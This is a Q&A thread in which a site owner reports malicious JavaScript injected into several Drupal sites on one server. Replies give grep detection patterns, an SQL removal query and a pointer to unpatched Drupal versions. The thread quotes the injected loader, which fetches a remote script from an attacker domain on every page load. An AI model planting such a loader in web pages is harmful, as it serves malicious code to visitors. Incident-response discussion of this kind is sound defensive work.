# Javascript injected in all drupal websites of a server

Tags: javascript, drupal, client-side-attacks

From last few days, my sites have been come across malicious attack. When I open a site http://site1.com it first goes to redirected on another page (possibly an ad page).

In chrome browser when I try to diagnose the problem through console (F12), I found it shows me a strange error. "Failed to load resource: net::ERR_NAME_NOT_RESOLVED" and url is - https://js.localstorage.tk/s.js?crt=new. In further investigation I found that it injects following script on every page load of every website on that particular server. (Not one site but 3-4 sites have been infected with same attack on same server).

```
var z = document.createElement("script"); z.type = "text/javascript"; z.src = "https://js.localstorage.tk/s.js?crt=new"; document.head.appendChild(z);
```

I have also tried to find this code snippet in hosted file systems of infected websites, using various "grep" commands as below but i couldn't found anything.

```
 grep -rwn /var/www/ -e 'js.localstorage.tk'
 grep -rwn /var/www/ -e 'var z'
 grep -rwn /var/www/ -e 'z.type'
 grep -rwn /var/www/ -e 'z.src'
 grep -rwn /var/www/ -e 'crt=new'
```

But no clue of malicious injected script. Same result in DB investigation.

When I access my site through LAN without internet then the same error with some weird URL :

```
GET https://js.localstorage.tk/s.js?crt=new net::ERR_NAME_NOT_RESOLVED debugger:///VM359:1
```

And worst thing is that now google has listed my sites into "Dangerous" list and it show warning "Deceptive site ahead" with dark red background.

Any help...!!!

Answer (score 2, accepted):

find code with this command

grep -rwn /var/www/ -e 'eval(String.fromCharCode'

Comment: Thanks @sadadd. You are right. This command gave me the entire list of affected files. Can anyone explain me how those files have been affected? Should I further investigate for any batch file or some virus file? If yes, then how.

Comment: In my case, all *.tpl.php files were get afftected in /var/www/ directory.

Answer (score 1):

You should check your DB.

I have the same problem and found the script in every row of field_data_body table in body_summary column.

Perform a on all tables with the following query: %js.localstorage.tk%

Here is a removal query:

```
UPDATE field_data_body SET `body_summary`=REPLACE(`body_summary`,"<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>","");
```

Comment: In my case @sadadd's answer helped and worked well. As I mentioned in question that I couldn't find any such keyword in DB using like operators. By the way thanks for sharing your scenario so that it may help to future visitors to this thread.

Comment: Additionally, Please share the route cause of the said attack, If you been able to find it. Which part of server/file compromised so that this kind of malicious thing happened ?

Comment: @SohelPathan: I've seen this on servers that did not upgrade in time to the latest Drupal versions over the last several weeks. See https://www.drupal.org/security/ for details.

Comment: @bhotel thanks for your reply, I will check it out for Drupal version and other security alerts if any.

Comment: @bhotel you are right. It shows notification stating "Security update required!". I will do the update. Apart from that I also found that all *.tpl.php on that particular server were affected on same timestamp. How it was been attacked ? On the fly over internet ? Or some batch/script file is still exists on my server which caused the malicious thing.

Comment: @SohelPathan There may be no way to tell. There's a Drupal-specific guide for what to do after your site's been compromised here: https://www.drupal.org/docs/develop/security/your-drupal-site-got-hacked-now-what